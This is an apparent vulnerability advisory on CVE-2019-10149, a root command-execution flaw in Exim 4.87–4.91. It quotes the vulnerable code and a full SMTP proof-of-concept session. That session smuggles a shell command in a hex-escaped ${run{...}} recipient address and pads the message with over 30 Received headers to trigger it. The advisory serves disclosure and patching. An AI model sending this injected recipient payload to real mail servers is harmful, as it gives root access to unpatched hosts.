Allele Security Alert
ASA-2019-00320
Identifier(s)
ASA-2019-00320, CVE-2019-10149
Title
Remote command execution (RCE) via recipient address
Vendor(s)
The Exim Maintainers
Product(s)
Exim
Affected version(s)
Exim versions from 4.87 to 4.91
Fixed version(s)
Exim version 4.92
Proof of concept
Unknown
Description
A flaw was found in the way exim validated recipient address. A remote attacker could use this flaw to execute arbitrary command on the exim server with the permissions of the user running the application.
Technical details
The vulnerable code is located in deliver_message():
6122 #ifndef DISABLE_EVENT 6123 if (process_recipients != RECIP_ACCEPT) 6124 { 6125 uschar * save_local = deliver_localpart; 6126 const uschar * save_domain = deliver_domain; 6127 6128 deliver_localpart = expand_string( 6129 string_sprintf("${local_part:%s}", new->address)); 6130 deliver_domain = expand_string( 6131 string_sprintf("${domain:%s}", new->address)); 6132 6133 (void) event_raise(event_action, 6134 US"msg:fail:internal", new->message); 6135 6136 deliver_localpart = save_local; 6137 deliver_domain = save_domain; 6138 } 6139 #endif
Because expand_string() recognizes the “${run{<command> <args>}}” expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to “${run{…}}@localhost” (where “localhost” is one of Exim’s local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):
john@debian:~$ cat /tmp/id cat: /tmp/id: No such file or directory john@debian:~$ nc 127.0.0.1 25 220 debian ESMTP Exim 4.89 Thu, 23 May 2019 09:10:41 -0400 HELO localhost 250 debian Hello localhost [127.0.0.1] MAIL FROM:<> 250 OK RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost> 250 Accepted DATA 354 Enter message, ending with "." on a line by itself Received: 1 Received: 2 Received: 3 Received: 4 Received: 5 Received: 6 Received: 7 Received: 8 Received: 9 Received: 10 Received: 11 Received: 12 Received: 13 Received: 14 Received: 15 Received: 16 Received: 17 Received: 18 Received: 19 Received: 20 Received: 21 Received: 22 Received: 23 Received: 24 Received: 25 Received: 26 Received: 27 Received: 28 Received: 29 Received: 30 Received: 31 . 250 OK id=1hTnYa-0000zp-8b QUIT 221 debian closing connection john@debian:~$ cat /tmp/id cat: /tmp/id: Permission denied root@debian:~# cat /tmp/id uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim) uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
In this example:
– we send more than received_headers_max (30, by default) “Received:” headers to the mail server, to set process_recipients to RECIP_FAIL_LOOP and hence execute the vulnerable code;
– we escape invalid characters in the recipient’s address with backslashes, which are conveniently interpreted by expand_string() (in expand_string_internal() and transport_set_up_command()).
Credits
Qualys Research Labs
Reference(s)
CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
https://seclists.org/oss-sec/2019/q2/140
CVE-2019-10149 Exim 4.87 to 4.91
https://www.exim.org/static/doc/security/CVE-2019-10149.txt
Fix CVE-2019-10149
https://git.exim.org/exim.git/commit/d740d2111f189760593a303124ff6b9b1f83453d
Exim CVE-2019-10149, how to protect yourself
https://blog.cpanel.com/exim-cve-2019-10149-protect-yourself/
Qualys Security Advisory – The Return of the WIZard: RCE in Exim (CVE-2019-10149)
https://seclists.org/oss-sec/2019/q2/153
CVE-2019-10149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149
CVE-2019-10149
https://nvd.nist.gov/vuln/detail/CVE-2019-10149
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: June 8, 2019